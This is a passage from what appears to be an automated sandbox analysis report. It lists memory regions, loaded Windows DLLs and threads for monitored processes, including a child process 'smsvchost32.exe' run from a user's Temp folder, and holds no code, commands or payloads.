	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 796
	        start_va = 0x7ffc11f60000
	          end_va = 0x7ffc125a3fff
	     entry_point = 0x7ffc11f60000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 797
	        start_va = 0x7ffc125b0000
	          end_va = 0x7ffc12664fff
	     entry_point = 0x7ffc125b0000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 798
	        start_va = 0x7ffc12670000
	          end_va = 0x7ffc126d9fff
	     entry_point = 0x7ffc12670000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 799
	        start_va = 0x7ffc126e0000
	          end_va = 0x7ffc12722fff
	     entry_point = 0x7ffc126e0000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 800
	        start_va = 0x7ffc12840000
	          end_va = 0x7ffc12a27fff
	     entry_point = 0x7ffc12840000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 801
	        start_va = 0x7ffc12a30000
	          end_va = 0x7ffc12ad6fff
	     entry_point = 0x7ffc12a30000
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")

Region:
	              id = 802
	        start_va = 0x7ffc12c40000
	          end_va = 0x7ffc1419efff
	     entry_point = 0x7ffc12c40000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 803
	        start_va = 0x7ffc141a0000
	          end_va = 0x7ffc14325fff
	     entry_point = 0x7ffc141a0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 804
	        start_va = 0x7ffc145f0000
	          end_va = 0x7ffc1469cfff
	     entry_point = 0x7ffc145f0000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 805
	        start_va = 0x7ffc14700000
	          end_va = 0x7ffc1481bfff
	     entry_point = 0x7ffc14700000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 806
	        start_va = 0x7ffc14820000
	          end_va = 0x7ffc1485afff
	     entry_point = 0x7ffc14820000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 807
	        start_va = 0x7ffc14860000
	          end_va = 0x7ffc148b1fff
	     entry_point = 0x7ffc14860000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 808
	        start_va = 0x7ffc148c0000
	          end_va = 0x7ffc14b3cfff
	     entry_point = 0x7ffc148c0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 809
	        start_va = 0x7ffc14d10000
	          end_va = 0x7ffc14e65fff
	     entry_point = 0x7ffc14d10000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 810
	        start_va = 0x7ffc152a0000
	          end_va = 0x7ffc15360fff
	     entry_point = 0x7ffc152a0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 811
	        start_va = 0x7ffc15480000
	          end_va = 0x7ffc154dafff
	     entry_point = 0x7ffc15480000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 812
	        start_va = 0x7ffc154e0000
	          end_va = 0x7ffc15586fff
	     entry_point = 0x7ffc154e0000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 813
	        start_va = 0x7ffc15590000
	          end_va = 0x7ffc1562cfff
	     entry_point = 0x7ffc15590000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 814
	        start_va = 0x7ffc15630000
	          end_va = 0x7ffc157f0fff
	     entry_point = 0x7ffc15630000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")


Thread:
	id = 34
	os_tid = 0xce8


Thread:
	id = 35
	os_tid = 0xb08


Thread:
	id = 36
	os_tid = 0xb00


Thread:
	id = 37
	os_tid = 0xaf8


Thread:
	id = 38
	os_tid = 0xaf0


Thread:
	id = 39
	os_tid = 0xaec


Thread:
	id = 40
	os_tid = 0xae4


Process:
	id = "6"
	image_name = "smsvchost32.exe"
	filename = "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe"
	page_root = "0x6b8a2000"
	os_pid = "0xdb0"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "3"
	os_parent_pid = "0xff8"
	cmd_line = "\"C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe\" "
	cur_dir = "C:\\Users\\Nd9E1FYi\\Desktop\\"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f009" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 835
	        start_va = 0x10000
	          end_va = 0x2ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 836
	        start_va = 0x30000
	          end_va = 0x31fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000030000"
	        filename = ""

Region:
	              id = 837
	        start_va = 0x40000
	          end_va = 0x54fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000040000"
	        filename = ""

Region:
	              id = 838
	        start_va = 0x60000
	          end_va = 0x9ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000060000"
	        filename = ""

Region:
	              id = 839
	        start_va = 0xa0000
	          end_va = 0x19ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000000a0000"
	        filename = ""

Region:
	              id = 840
	        start_va = 0x1a0000
	          end_va = 0x1a3fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 841
	        start_va = 0x200000
	          end_va = 0x3fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000200000"
	        filename = ""

Region:
	              id = 842
	        start_va = 0x400000
	          end_va = 0x43cfff
	     entry_point = 0x400000
	     region_type = mapped_file
	            name = "smsvchost32.exe"
	        filename = "\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe")

Region:
	              id = 843
	        start_va = 0x77960000
	          end_va = 0x77adafff
	     entry_point = 0x77960000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 844
	        start_va = 0x7ffb0000
	          end_va = 0x7ffd2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ffb0000"
	        filename = ""

Region:
	              id = 845
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 846
	        start_va = 0x7fff0000
	          end_va = 0x7ffc1562ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 847
	        start_va = 0x7ffc15630000
	          end_va = 0x7ffc157f0fff
	     entry_point = 0x7ffc15630000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 848
	        start_va = 0x7ffc157f1000
	          end_va = 0x7ffffffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ffc157f1000"
	        filename = ""

Region:
	              id = 850
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 851
	        start_va = 0x510000
	          end_va = 0x51ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000510000"
	        filename = ""

Region:
	              id = 852
	        start_va = 0x55c00000
	          end_va = 0x55c79fff
	     entry_point = 0x55c00000
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 853
	        start_va = 0x55c90000
	          end_va = 0x55cdffff
	     entry_point = 0x55c90000
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 854
	        start_va = 0x55c80000
	          end_va = 0x55c87fff
	     entry_point = 0x55c80000
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 855
	        start_va = 0x710000
	          end_va = 0x80ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000710000"
	        filename = ""

Region:
	              id = 856
	        start_va = 0x765a0000
	          end_va = 0x7667ffff
	     entry_point = 0x765a0000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 857
	        start_va = 0x774c0000
	          end_va = 0x7763dfff
	     entry_point = 0x774c0000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 858
	        start_va = 0x10000
	          end_va = 0x1ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 859
	        start_va = 0x440000
	          end_va = 0x4fdfff
	     entry_point = 0x440000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 860
	        start_va = 0x745e0000
	          end_va = 0x74671fff
	     entry_point = 0x745e0000
	     region_type = mapped_file
	            name = "apphelp.dll"
	        filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll")

Region:
	              id = 861
	        start_va = 0x7feb0000
	          end_va = 0x7ffaffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007feb0000"
	        filename = ""

Region:
	              id = 862
	        start_va = 0x20000
	          end_va = 0x23fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 863
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 864
	        start_va = 0x520000
	          end_va = 0x61ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000520000"
	        filename = ""

Region:
	              id = 865
	        start_va = 0x70010000
	          end_va = 0x70019fff
	     entry_point = 0x70010000
	     region_type = mapped_file
	            name = "cmpbk32.dll"
	        filename = "\\Windows\\SysWOW64\\cmpbk32.dll" (normalized: "c:\\windows\\syswow64\\cmpbk32.dll")

Region:
	              id = 866
	        start_va = 0x747c0000
	          end_va = 0x7487dfff
	     entry_point = 0x747c0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 867
	        start_va = 0x76f00000
	          end_va = 0x7704efff
	     entry_point = 0x76f00000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 868
	        start_va = 0x77810000
	          end_va = 0x77956fff
	     entry_point = 0x77810000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 869
	        start_va = 0x6fff0000
	          end_va = 0x6fff7fff
	     entry_point = 0x6fff0000
	     region_type = mapped_file
	            name = "version.dll"
	        filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")

Region:
	              id = 870
	        start_va = 0x70000000
	          end_va = 0x7000efff
	     entry_point = 0x70000000
	     region_type = mapped_file
	            name = "cmutil.dll"
	        filename = "\\Windows\\SysWOW64\\cmutil.dll" (normalized: "c:\\windows\\syswow64\\cmutil.dll")

Region:
	              id = 871
	        start_va = 0x74680000
	          end_va = 0x74689fff
	     entry_point = 0x74680000
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 872
	        start_va = 0x74690000
	          end_va = 0x746adfff
	     entry_point = 0x74690000
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 873
	        start_va = 0x74720000
	          end_va = 0x74763fff
	     entry_point = 0x74720000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 874
	        start_va = 0x74aa0000
	          end_va = 0x74b1afff
	     entry_point = 0x74aa0000
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 875
	        start_va = 0x75070000
	          end_va = 0x7511cfff
	     entry_point = 0x75070000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 876
	        start_va = 0x773a0000
	          end_va = 0x773f7fff
	     entry_point = 0x773a0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 877
	        start_va = 0x640000
	          end_va = 0x64ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000640000"
	        filename = ""

Region:
	              id = 878
	        start_va = 0x810000
	          end_va = 0x997fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000810000"
	        filename = ""

Region:
	              id = 879
	        start_va = 0x772e0000
	          end_va = 0x7730afff
	     entry_point = 0x772e0000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 880
	        start_va = 0x30000
	          end_va = 0x30fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000030000"
	        filename = ""

Region:
	              id = 881
	        start_va = 0x500000
	          end_va = 0x500fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000500000"
	        filename = ""

Region:
	              id = 882
	        start_va = 0x9a0000
	          end_va = 0xb20fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000009a0000"
	        filename = ""

Region:
	              id = 883
	        start_va = 0xb30000
	          end_va = 0x1f2ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000b30000"
	        filename = ""

Region:
	              id = 884
	        start_va = 0x6ffa0000
	          end_va = 0x6ffe9fff
	     entry_point = 0x6ffa0000
	     region_type = mapped_file
	            name = "eappcfg.dll"
	        filename = "\\Windows\\SysWOW64\\eappcfg.dll" (normalized: "c:\\windows\\syswow64\\eappcfg.dll")

Region:
	              id = 885
	        start_va = 0x620000
	          end_va = 0x620fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000620000"
	        filename = ""

Region:
	              id = 886
	        start_va = 0x630000
	          end_va = 0x630fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000630000"
	        filename = ""

Region:
	              id = 887
	        start_va = 0x650000
	          end_va = 0x682fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000650000"
	        filename = ""

Region:
	              id = 888
	        start_va = 0x702b0000
	          end_va = 0x704bcfff
	     entry_point = 0x702b0000
	     region_type = mapped_file
	            name = "wininet.dll"
	        filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll")

Region:
	              id = 889
	        start_va = 0x74880000
	          end_va = 0x74a3cfff
	     entry_point = 0x74880000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 890
	        start_va = 0x74b20000
	          end_va = 0x74b64fff
	     entry_point = 0x74b20000
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 891
	        start_va = 0x772c0000
	          end_va = 0x772c5fff
	     entry_point = 0x772c0000
	     region_type = mapped_file
	            name = "psapi.dll"
	        filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")

Region:
	              id = 892
	        start_va = 0x701e0000
	          end_va = 0x701f8fff
	     entry_point = 0x701e0000
	     region_type = mapped_file
	            name = "userenv.dll"
	        filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll")

Region:
	              id = 893
	        start_va = 0x766e0000
	          end_va = 0x766eefff
	     entry_point = 0x766e0000
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")

Region:
	              id = 895
	        start_va = 0x746c0000
	          end_va = 0x7471efff
	     entry_point = 0x746c0000
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 896
	        start_va = 0x70210000
	          end_va = 0x702aafff
	     entry_point = 0x70210000
	     region_type = mapped_file
	            name = "winhttp.dll"
	        filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")

Region:
	              id = 897
	        start_va = 0x77490000
	          end_va = 0x774a2fff
	     entry_point = 0x77490000
	     region_type = mapped_file
	            name = "netapi32.dll"
	        filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll")

Region:
	              id = 898
	        start_va = 0x6ff90000
	          end_va = 0x6ff99fff
	     entry_point = 0x6ff90000
	     region_type = mapped_file
	            name = "netutils.dll"
	        filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll")

Region:
	              id = 899
	        start_va = 0x6ff70000
	          end_va = 0x6ff84fff
	     entry_point = 0x6ff70000
	     region_type = mapped_file
	            name = "samcli.dll"
	        filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll")

Region:
	              id = 900
	        start_va = 0x6ff60000
	          end_va = 0x6ff69fff
	     entry_point = 0x6ff60000
	     region_type = mapped_file
	            name = "secur32.dll"
	        filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")

Region:
	              id = 901
	        start_va = 0x75120000
	          end_va = 0x7651efff
	     entry_point = 0x75120000
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")

Region:
	              id = 902
	        start_va = 0x76ec0000
	          end_va = 0x76ef6fff
	     entry_point = 0x76ec0000
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")

Region:
	              id = 903
	        start_va = 0x74b70000
	          end_va = 0x75068fff
	     entry_point = 0x74b70000
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")

Region:
	              id = 904
	        start_va = 0x77760000
	          end_va = 0x7776bfff
	     entry_point = 0x77760000
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 905
	        start_va = 0x77400000
	          end_va = 0x7748cfff
	     entry_point = 0x77400000
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")

Region:
	              id = 906
	        start_va = 0x74770000
	          end_va = 0x747b3fff
	     entry_point = 0x74770000
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")

Region:
	              id = 907
	        start_va = 0x771d0000
	          end_va = 0x772bafff
	     entry_point = 0x771d0000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 908
	        start_va = 0x1f30000
	          end_va = 0x1fc0fff
	     entry_point = 0x1f30000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 909
	        start_va = 0x690000
	          end_va = 0x6cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000690000"
	        filename = ""

Region:
	              id = 910
	        start_va = 0x1f30000
	          end_va = 0x202ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000001f30000"
	        filename = ""

Region:
	              id = 911
	        start_va = 0x2030000
	          end_va = 0x2366fff
	     entry_point = 0x2030000
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")

Region:
	              id = 912
	        start_va = 0x6d0000
	          end_va = 0x70ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000006d0000"
	        filename = ""

Region:
	              id = 913
	        start_va = 0x2370000
	          end_va = 0x246ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002370000"
	        filename = ""

Region:
	              id = 914
	        start_va = 0x2470000
	          end_va = 0x24affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002470000"
	        filename = ""

Region:
	              id = 915
	        start_va = 0x24b0000
	          end_va = 0x25affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000024b0000"
	        filename = ""

Region:
	              id = 916
	        start_va = 0x690000
	          end_va = 0x6a6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000690000"
	        filename = ""

Region:
	              id = 917
	        start_va = 0x1f30000
	          end_va = 0x202ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000001f30000"
	        filename = ""

Region:
	              id = 918
	        start_va = 0x71ea0000
	          end_va = 0x71eeefff
	     entry_point = 0x71ea0000
	     region_type = mapped_file
	            name = "mswsock.dll"
	        filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")

Region:
	              id = 919
	        start_va = 0x690000
	          end_va = 0x6cffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000690000"
	        filename = ""

Region:
	              id = 920
	        start_va = 0x25b0000
	          end_va = 0x26affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000025b0000"
	        filename = ""

Region:
	              id = 921
	        start_va = 0x26b0000
	          end_va = 0x26effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000026b0000"
	        filename = ""

Region:
	              id = 922
	        start_va = 0x26f0000
	          end_va = 0x27effff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000026f0000"
	        filename = ""

Region:
	              id = 923
	        start_va = 0x27f0000
	          end_va = 0x282ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000027f0000"
	        filename = ""

Region:
	              id = 924
	        start_va = 0x2830000
	          end_va = 0x292ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002830000"
	        filename = ""

Region:
	              id = 925
	        start_va = 0x2930000
	          end_va = 0x296ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002930000"
	        filename = ""

Region:
	              id = 926
	        start_va = 0x2970000
	          end_va = 0x2a6ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002970000"
	        filename = ""

Region:
	              id = 927
	        start_va = 0x2470000
	          end_va = 0x24affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002470000"
	        filename = ""

Region:
	              id = 928
	        start_va = 0x24b0000
	          end_va = 0x25affff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000024b0000"
	        filename = ""

Region:
	              id = 929
	        start_va = 0x2a70000
	          end_va = 0x2aaffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002a70000"
	        filename = ""

Region:
	              id = 930
	        start_va = 0x2ab0000
	          end_va = 0x2baffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002ab0000"
	        filename = ""

Region:
	              id = 931
	        start_va = 0x2bb0000
	          end_va = 0x2bc6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 947
	        start_va = 0x2bd0000
	          end_va = 0x2c0ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bd0000"
	        filename = ""

Region:
	              id = 948
	        start_va = 0x2c10000
	          end_va = 0x2d0ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002c10000"
	        filename = ""

Region:
	              id = 965
	        start_va = 0x2bb0000
	          end_va = 0x2bc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 1017
	        start_va = 0x2d10000
	          end_va = 0x2d26fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002d10000"
	        filename = ""

Region:
	              id = 1038
	        start_va = 0x2bb0000
	          end_va = 0x2bc6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 1044
	        start_va = 0x2bb0000
	          end_va = 0x2bc7fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 1048
	        start_va = 0x2bb0000
	          end_va = 0x2bc6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 1076
	        start_va = 0x2bb0000
	          end_va = 0x2bc6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bb0000"
	        filename = ""

Region:
	              id = 1117
	        start_va = 0x2bb0000
	          end_va = 0x2bc6fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002bb0000"
	        filename = ""

